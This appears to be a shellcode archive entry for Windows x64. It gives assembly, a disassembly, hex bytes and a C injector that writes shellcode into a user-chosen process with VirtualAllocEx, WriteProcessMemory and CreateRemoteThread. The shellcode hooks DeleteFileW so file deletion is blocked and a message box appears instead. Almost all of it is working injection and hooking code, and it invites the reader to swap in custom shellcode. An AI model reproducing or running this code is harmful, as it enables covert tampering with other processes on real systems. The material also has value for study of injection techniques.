Windows x64 - API Hooking Shellcode (117 bytes)

Properties

Published:
20.11.2017
Target:
Windows x64

Code

/*
 
    # Title : Windows x64 API Hooking Shellcode
    # Author : Roziul Hasan Khan Shifat
    # Size : 117 bytes
    # Date : 16/10/2017
    # Email : shifath12@gmail.com
    # Tested On : Windows 7 Ultimate x64
 
 
 
*/
 
 
/*
 
This Shellcode hooks DeteleFileW() API
Warning: Do no Use this Shellcode on explorer.exe Otherwise You won't be able to delete file from Recycle Bin
 
*/
 
 
 
/*
 
 
section .text
    global _start
_start:
 
xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PPEB
mov rax,[rax+24] ;PPEB->Ldr
mov rsi,[rax+32] ;Ldr->InMemOrderModuleList.Flink
mov rax,[rsi]
mov rsi,[rax]
 
mov rdi,[rsi+32] ;rdi=kernel32.dll base Address
 
;---------------------------------------------------------------
xor rsi,rsi
mov si,0x29f0
add rsi,rdi ;rsi=VirtualProtect()
 
;----------------------------------
;This Part is Important 
 
xor r12,r12
mov r12w,0xa2b0  ;0x0000a2b0 is Relative Address of DeleteFileW()
add r12,rdi ;r12=DeleteFileW()
 
;---------------------------------------------------
;Changing memory attribute
mov rcx,r12
push rdx
 
mov dl,9
 
pop r8
mov r8b,0x40
sub rsp,4
lea r14,[rsp]
mov r9,r14
call rsi
 
;--------------------------------------------------------
mov [r12],byte 0xe9
jmp shellcode
 
inj:
pop rdx
sub rdx,r12
sub rdx,5
mov [r12+1],rdx
 
xor rdx,rdx
mov dl,9
mov rcx,r12
mov r8d,dword [r14]
mov r9,r14
 
call rsi
add rsp,4
ret
 
 
 
shellcode:
call inj
;This is My own shellcode
db 0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48,0x8b,0x40,0x18,0x48,0x8b,0x70,0x20,0x48,0x8b,0x06,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x20,0x68,0x90,0x65,0x01,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xfb,0x52,0x52,0x48,0xb8,0x75,0x73,0x65,0x72,0x33,0x32,0x2e,0x64,0x48,0x89,0x04,0x24,0x66,0xc7,0x44,0x24,0x08,0x6c,0x6c,0x48,0x8d,0x0c,0x24,0x48,0x83,0xec,0x58,0xff,0xd3,0x68,0xb8,0x12,0x07,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xc3,0x48,0x31,0xc9,0x6a,0x10,0x41,0x59,0x51,0x51,0x48,0xba,0x41,0x50,0x49,0x20,0x42,0x6c,0x6f,0x63,0x48,0x89,0x14,0x24,0xc7,0x44,0x24,0x08,0x6b,0x65,0x64,0x21,0x48,0x8d,0x14,0x24,0x52,0x41,0x58,0x48,0x83,0xec,0x58,0x48,0x83,0xec,0x58,0xff,0xd3,0x90,0x48,0x31,0xd2,0x66,0xba,0x28,0x01,0x48,0x01,0xd4,0xc3
 
 
 
 
 
 
 
 
 
 
 
 
 
*/
 
 
 
/*
 
 
apiint.obj:     file format pe-x86-64
 
 
Disassembly of section .text:
 
0000000000000000 <_start>:
   0:   48 31 d2                xor    %rdx,%rdx
   3:   65 48 8b 42 60          mov    %gs:0x60(%rdx),%rax
   8:   48 8b 40 18             mov    0x18(%rax),%rax
   c:   48 8b 70 20             mov    0x20(%rax),%rsi
  10:   48 8b 06                mov    (%rsi),%rax
  13:   48 8b 30                mov    (%rax),%rsi
  16:   48 8b 7e 20             mov    0x20(%rsi),%rdi
  1a:   48 31 f6                xor    %rsi,%rsi
  1d:   66 be f0 29             mov    $0x29f0,%si
  21:   48 01 fe                add    %rdi,%rsi
  24:   4d 31 e4                xor    %r12,%r12
  27:   66 41 bc b0 a2          mov    $0xa2b0,%r12w
  2c:   49 01 fc                add    %rdi,%r12
  2f:   4c 89 e1                mov    %r12,%rcx
  32:   52                      push   %rdx
  33:   b2 09                   mov    $0x9,%dl
  35:   41 58                   pop    %r8
  37:   41 b0 40                mov    $0x40,%r8b
  3a:   48 83 ec 04             sub    $0x4,%rsp
  3e:   4c 8d 34 24             lea    (%rsp),%r14
  42:   4d 89 f1                mov    %r14,%r9
  45:   ff d6                   callq  *%rsi
  47:   41 c6 04 24 e9          movb   $0xe9,(%r12)
  4c:   eb 22                   jmp    70 
 
000000000000004e :
  4e:   5a                      pop    %rdx
  4f:   4c 29 e2                sub    %r12,%rdx
  52:   48 83 ea 05             sub    $0x5,%rdx
  56:   49 89 54 24 01          mov    %rdx,0x1(%r12)
  5b:   48 31 d2                xor    %rdx,%rdx
  5e:   b2 09                   mov    $0x9,%dl
  60:   4c 89 e1                mov    %r12,%rcx
  63:   45 8b 06                mov    (%r14),%r8d
  66:   4d 89 f1                mov    %r14,%r9
  69:   ff d6                   callq  *%rsi
  6b:   48 83 c4 04             add    $0x4,%rsp
  6f:   c3                      retq   
 
0000000000000070 :
  70:   e8 d9 ff ff ff          callq  4e 
  75:   48 31 d2                xor    %rdx,%rdx
  78:   65 48 8b 42 60          mov    %gs:0x60(%rdx),%rax
  7d:   48 8b 40 18             mov    0x18(%rax),%rax
  81:   48 8b 70 20             mov    0x20(%rax),%rsi
  85:   48 8b 06                mov    (%rsi),%rax
  88:   48 8b 30                mov    (%rax),%rsi
  8b:   48 8b 7e 20             mov    0x20(%rsi),%rdi
  8f:   68 90 65 01 0a          pushq  $0xa016590
  94:   80 74 24 03 0a          xorb   $0xa,0x3(%rsp)
  99:   5b                      pop    %rbx
  9a:   48 01 fb                add    %rdi,%rbx
  9d:   52                      push   %rdx
  9e:   52                      push   %rdx
  9f:   48 b8 75 73 65 72 33    movabs $0x642e323372657375,%rax
  a6:   32 2e 64 
  a9:   48 89 04 24             mov    %rax,(%rsp)
  ad:   66 c7 44 24 08 6c 6c    movw   $0x6c6c,0x8(%rsp)
  b4:   48 8d 0c 24             lea    (%rsp),%rcx
  b8:   48 83 ec 58             sub    $0x58,%rsp
  bc:   ff d3                   callq  *%rbx
  be:   68 b8 12 07 0a          pushq  $0xa0712b8
  c3:   80 74 24 03 0a          xorb   $0xa,0x3(%rsp)
  c8:   5b                      pop    %rbx
  c9:   48 01 c3                add    %rax,%rbx
  cc:   48 31 c9                xor    %rcx,%rcx
  cf:   6a 10                   pushq  $0x10
  d1:   41 59                   pop    %r9
  d3:   51                      push   %rcx
  d4:   51                      push   %rcx
  d5:   48 ba 41 50 49 20 42    movabs $0x636f6c4220495041,%rdx
  dc:   6c 6f 63 
  df:   48 89 14 24             mov    %rdx,(%rsp)
  e3:   c7 44 24 08 6b 65 64    movl   $0x2164656b,0x8(%rsp)
  ea:   21 
  eb:   48 8d 14 24             lea    (%rsp),%rdx
  ef:   52                      push   %rdx
  f0:   41 58                   pop    %r8
  f2:   48 83 ec 58             sub    $0x58,%rsp
  f6:   48 83 ec 58             sub    $0x58,%rsp
  fa:   ff d3                   callq  *%rbx
  fc:   90                      nop
  fd:   48 31 d2                xor    %rdx,%rdx
 100:   66 ba 28 01             mov    $0x128,%dx
 104:   48 01 d4                add    %rdx,%rsp
 107:   c3                      retq   
 
 
 
 
 
 
*/
 
 
 
 
 
 
#include
#include
#include
#include
 
unsigned char shellcode[]=\
 
//Main Shellcode (Interceptor Shellcode)
 
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x48\x31\xf6\x66\xbe\xf0\x29\x48\x01\xfe\x4d\x31\xe4\x66\x41\xbc\xb0\xa2\x49\x01\xfc\x4c\x89\xe1\x52\xb2\x09\x41\x58\x41\xb0\x40\x48\x83\xec\x04\x4c\x8d\x34\x24\x4d\x89\xf1\xff\xd6\x41\xc6\x04\x24\xe9\xeb\x22\x5a\x4c\x29\xe2\x48\x83\xea\x05\x49\x89\x54\x24\x01\x48\x31\xd2\xb2\x09\x4c\x89\xe1\x45\x8b\x06\x4d\x89\xf1\xff\xd6\x48\x83\xc4\x04\xc3\xe8\xd9\xff\xff\xff"
 
//Your Custom shellcode 
 
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x68\x90\x65\x01\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xfb\x52\x52\x48\xb8\x75\x73\x65\x72\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x68\xb8\x12\x07\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xc3\x48\x31\xc9\x6a\x10\x41\x59\x51\x51\x48\xba\x41\x50\x49\x20\x42\x6c\x6f\x63\x48\x89\x14\x24\xc7\x44\x24\x08\x6b\x65\x64\x21\x48\x8d\x14\x24\x52\x41\x58\x48\x83\xec\x58\x48\x83\xec\x58\xff\xd3\x90\x48\x31\xd2\x66\xba\x28\x01\x48\x01\xd4\xc3";
 
 
 
int main()
{
    HANDLE snap,proc,mem;
    DWORD len,l,pid;
    PROCESSENTRY32 ps;
     
     
    ps.dwSize=sizeof(ps);
    len=strlen(shellcode);
     
     
    snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if(snap==INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot() Failed");
        return 0;
    }
     
     
    if(!Process32First(snap,&ps))
    {
        printf("Process32First() Failed");
        return 0;
    }
     
     
     
    do
    {
        printf("%s : %ld\n",ps.szExeFile,ps.th32ProcessID);
    }while(Process32Next(snap,&ps));
     
    printf("\nEnter Process ID: ");
    scanf("%ld",&pid);
     
     
    proc=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
     
    if(!proc)
    {
        printf("Failed to Open Process");
        return 0;
    }
     
    mem=VirtualAllocEx(proc,NULL,len,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    if(!mem)
    {
        printf("Failed to allocate memory in process");
        return 0;
    }
     
    WriteProcessMemory(proc,mem,shellcode,len,NULL);
    VirtualProtectEx(proc,mem,len,PAGE_EXECUTE_READ,&l);
     
    CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)mem,NULL,0,0);
    CloseHandle(proc);
     
    return 0;
}